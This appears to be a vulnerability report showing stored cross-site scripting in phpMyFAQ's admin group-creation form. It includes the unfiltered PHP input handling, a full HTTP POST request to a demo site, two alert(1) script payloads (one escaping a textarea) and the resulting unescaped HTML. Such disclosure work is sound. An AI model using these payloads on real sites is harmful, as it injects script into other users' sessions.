The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Code:
if ($groupAction == 'addsave' && $user->perm->hasPermission($user->getUserId(), 'addgroup')) {
$user = new User($faqConfig);
$message = '';
$messages = [];
$groupName = Filter::filterInput(INPUT_POST, 'group_name', FILTER_UNSAFE_RAW, '');
$groupDescription = Filter::filterInput(INPUT_POST, 'group_description', FILTER_UNSAFE_RAW, '');
$groupAutoJoin = Filter::filterInput(INPUT_POST, 'group_auto_join', FILTER_UNSAFE_RAW, '');
$csrfOkay = true;
$csrfToken = Filter::filterInput(INPUT_POST, 'csrf', FILTER_UNSAFE_RAW);
Request:
POST /admin/?action=group&group_action=addsave HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=EDITthis; cookieconsent_status=dismiss; pmf_sid=34
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://roy.demo.phpmyfaq.de/
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
csrf=EDITthis&group_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&group_description=%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Payload 1:
</textarea><script>alert(1)</script>
Payload 2:
<script>alert(1)</script>
Result:
<div>
<h5>
<i></i> Group details </h5>
<form action="?action=group&group_action=update_data" method="post">
<input id="update_group_id" type="hidden" name="group_id" value="0">
<div>
<div>
<label class="col-lg-3 col-form-label" for="update_group_name">
Name </label>
<div>
<input id="update_group_name" type="text" name="name" class="form-control"
tabindex="1" value="<script>alert(1)</script>">
</div>
</div>
<div>
<label class="col-lg-3 col-form-label" for="update_group_description">
Description </label>
<div>
<textarea id="update_group_description" name="description" class="form-control"
rows="3"
tabindex="2"></textarea><script>alert(1)</script></textarea>
</div>
</div>